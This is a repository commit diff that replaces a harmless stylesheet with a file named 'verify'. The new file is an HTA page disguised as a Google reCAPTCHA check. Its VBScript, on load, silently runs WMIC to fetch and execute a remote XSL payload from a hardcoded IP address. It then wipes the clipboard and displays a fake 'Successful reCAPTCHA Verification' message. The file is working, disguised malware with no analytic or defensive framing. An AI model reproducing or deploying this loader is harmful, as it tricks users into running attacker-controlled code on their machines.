enotkrutoy commited on
Commit
063463f
·
verified ·
1 Parent(s): f44c384

Rename style.css to verify

Browse files
Files changed (2) hide show
  1. style.css +0 -28
  2. verify +92 -0
style.css DELETED
@@ -1,28 +0,0 @@
1
- body {
2
- padding: 2rem;
3
- font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif;
4
- }
5
-
6
- h1 {
7
- font-size: 16px;
8
- margin-top: 0;
9
- }
10
-
11
- p {
12
- color: rgb(107, 114, 128);
13
- font-size: 15px;
14
- margin-bottom: 10px;
15
- margin-top: 5px;
16
- }
17
-
18
- .card {
19
- max-width: 620px;
20
- margin: 0 auto;
21
- padding: 16px;
22
- border: 1px solid lightgray;
23
- border-radius: 16px;
24
- }
25
-
26
- .card p:last-child {
27
- margin-bottom: 0;
28
- }
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
verify ADDED
@@ -0,0 +1,92 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html>
3
+ <head>
4
+ <title>reCAPTCHA Verification</title>
5
+ <HTA:APPLICATION
6
+ APPLICATIONNAME="reCAPTCHA Verification"
7
+ BORDER="thin"
8
+ BORDERSTYLE="normal"
9
+ ICON="https://support.google.com/favicon.ico"
10
+ SHOWINTASKBAR="yes"
11
+ SINGLEINSTANCE="yes"
12
+ WINDOWSTATE="normal"
13
+ SCROLL="no"
14
+ SCROLLFLAT="yes"
15
+ SYSMENU="yes"
16
+ />
17
+ <style>
18
+ body {
19
+ font-family: Roboto, helvetica, arial, sans-serif;
20
+ margin: 0;
21
+ padding: 20px;
22
+ text-align: center;
23
+ color: #555;
24
+ box-sizing: border-box;
25
+ display: flex;
26
+ flex-direction: column;
27
+ justify-content: center;
28
+ align-items: center;
29
+ width: 100%;
30
+ height: 100%;
31
+ }
32
+ img {
33
+ width: 200px;
34
+ margin-bottom: 20px;
35
+ }
36
+ #error {
37
+ color: green;
38
+ }
39
+ .terms {
40
+ font-size: small;
41
+ color: #555;
42
+ }
43
+ .terms a {
44
+ text-decoration: none;
45
+ }
46
+ .terms a:hover {
47
+ text-decoration: underline;
48
+ }
49
+ </style>
50
+ <script language="VBScript">
51
+ Sub Window_onLoad
52
+ Window.ResizeTo 520, 480
53
+ Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
+
55
+ Set objShell = CreateObject("WScript.Shell")
56
+ objShell.Run "cmd /c echo os get /format:""http://3.140.250.70/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
57
+
58
+
59
+ ClearClipboard
60
+
61
+ objShell.Run "timeout /T 2 /nobreak", 0, True
62
+ Call HideConnectingShowError
63
+ objShell.Run "timeout /T 1 /nobreak", 0, True
64
+ End Sub
65
+
66
+ Sub HideConnectingShowError
67
+ document.getElementById("connecting").style.display = "none"
68
+ document.getElementById("error").style.display = "block"
69
+ End Sub
70
+
71
+ Sub ClearClipboard
72
+ Dim objHTML
73
+ Set objHTML = CreateObject("htmlfile")
74
+ objHTML.parentWindow.clipboardData.setData "text", ""
75
+ Set objHTML = Nothing
76
+ End Sub
77
+ </script>
78
+ </head>
79
+ <body>
80
+ <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
81
+ <div id="connecting" style="display:block;">
82
+ <p>Verifying reCAPTCHA, please wait...</p>
83
+ </div>
84
+ <div id="error" style="display:none;">
85
+ <p><b>Successful reCAPTCHA Verification!</b><br></p>
86
+ </div>
87
+ <p class="terms">
88
+ <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
89
+ <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
90
+ </p>
91
+ </body>
92
+ </html>